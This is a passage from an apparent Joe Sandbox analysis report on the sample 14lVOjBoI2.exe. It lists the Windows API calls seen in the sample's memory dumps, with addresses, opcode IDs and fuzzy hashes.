                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Enum$CloseOpenValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 167947723-0
                                                                                                          • Opcode ID: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                          • Instruction ID: caa0a88e983a87845293d3a09aded013c5498a2120ee6ea3f3930af667db2d56
                                                                                                          • Opcode Fuzzy Hash: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                          • Instruction Fuzzy Hash: 9FF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                                          APIs
                                                                                                          • SetFilePointer.KERNELBASE(00000000), ref: 10002963
                                                                                                          • GetLastError.KERNEL32 ref: 10002A6A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2128913504.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2128848115.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2128967473.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2129045974.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                          • String ID:
                                                                                                          • API String ID: 2976181284-0
                                                                                                          • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                          • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                          • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                          • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                          APIs
                                                                                                            • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000482,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsr675C.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3677997916-0
                                                                                                          • Opcode ID: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                          • Instruction ID: 28617f4b1a8802b5017de0243b5a45cf97da40b04a50325282b533cdbf166070
                                                                                                          • Opcode Fuzzy Hash: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                          • Instruction Fuzzy Hash: 64115E31911205EBDB14CFA4DA489AEB7B4EF44354B20843FE446B72D0DAB89A41EB59
                                                                                                          APIs
                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                          • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3850602802-0
                                                                                                          • Opcode ID: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                          • Instruction ID: cd3aabbb77ee63ed71f9921c47df44d3aa6e588553b0b950a072bc92d791a3e5
                                                                                                          • Opcode Fuzzy Hash: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                          • Instruction Fuzzy Hash: 2101F4316202209FE7095B389D05B6A3698E710319F10863FF851F62F1DA78DC428B4C
                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                            • Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                            • Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
                                                                                                            • Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 2547128583-0
                                                                                                          • Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                          • Instruction ID: 5d7b52194fecd52e31197542c52f699420a2dcfb6f4997f05ddeecd74f4f3bdc
                                                                                                          • Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                          • Instruction Fuzzy Hash: 70E0863660422066D61057705E44D3763AC9E94704306043EFA46F2041DB78DC32AA6E
                                                                                                          APIs
                                                                                                          • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$EnableShow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1136574915-0
                                                                                                          • Opcode ID: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                          • Instruction ID: 46dfe73b81ae29a5099323896a5bc3e3d9df575198e3285abdeb67f25c429c8d
                                                                                                          • Opcode Fuzzy Hash: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                          • Instruction Fuzzy Hash: 76E08C326005009BCB10AFB5AA4999D3375DF90369710007BE402F10E1CABC9C409A2D
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\14lVOjBoI2.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$AttributesCreate
                                                                                                          • String ID:
                                                                                                          • API String ID: 415043291-0
                                                                                                          • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                          • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                                          • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                          • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                                                          APIs
                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
                                                                                                          • GetLastError.KERNEL32 ref: 00405714
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 1375471231-0
                                                                                                          • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                          • Instruction ID: 3f205c5890689a668e8791f8cf6ed098ce3dcc56284ebb1818e0a19aeae2b5ff
                                                                                                          • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                          • Instruction Fuzzy Hash: DBC04C30225602DADA106F34DE087177951AB90741F1184396146E61A0DA348415E93D
                                                                                                          APIs
                                                                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                                            • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FilePointerwsprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 327478801-0
                                                                                                          • Opcode ID: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                          • Instruction ID: c5c3fa32fc6d0159c61c67e46e8878479b4609e7a69e49ca0ebb3ecbbe822ed2
                                                                                                          • Opcode Fuzzy Hash: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                          • Instruction Fuzzy Hash: A0E04F71702514EFDB01AFA59E4ACAFBB6AEB40328B14443BF501F00E1DA7D8C019A2D
                                                                                                          APIs
                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfileStringWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 390214022-0
                                                                                                          • Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                          • Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
                                                                                                          • Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                          • Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000482,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Open
                                                                                                          • String ID:
                                                                                                          • API String ID: 71445658-0
                                                                                                          • Opcode ID: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                          • Instruction ID: 180cb462b76767e938a43b2c67eaf1f9418a6812eb156052446fd1a81c43fca4
                                                                                                          • Opcode Fuzzy Hash: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                          • Instruction Fuzzy Hash: 54E0BF76154108AFDB00DFA5EE46EA977ECAB44704F044025BA09E7191C674E5509768
                                                                                                          APIs
                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,00000004,00000000), ref: 00405CF0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3934441357-0
                                                                                                          • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                          • Instruction ID: d2761c75b63c3b5a1b4cb2cfb4b6a55fbed1fd27b7f8bdfe76624f6b99830631
                                                                                                          • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                          • Instruction Fuzzy Hash: 2AE0EC3221425AABDF109E55EC08FEB7B6CEF05360F049437FA55E7190D631E921DBA4
                                                                                                          APIs
                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CC1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 2738559852-0
                                                                                                          • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                          • Instruction ID: 881bd9ca443264ea0180802fa9c86a3c9bfb0e6b132b989af4612487e9445b73
                                                                                                          • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                          • Instruction Fuzzy Hash: D1E08632104259ABDF105E518C00AEB376CFB04361F104432F911E3140D630E8119FB4
                                                                                                          APIs
                                                                                                          • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2128913504.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2128848115.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2128967473.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2129045974.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                          • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                          • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                          APIs
                                                                                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AttributesFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 3188754299-0
                                                                                                          • Opcode ID: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                          • Instruction ID: 4fb9e9dd77d4d4fa14caa6284e3e33111a790732df8c0ecbc47c365062d5febc
                                                                                                          • Opcode Fuzzy Hash: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                          • Instruction Fuzzy Hash: 4BD05E33B04100DBCB10DFE8AE08ADD77B5AB80338B248177E601F21E4D6B8C650AB1D
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
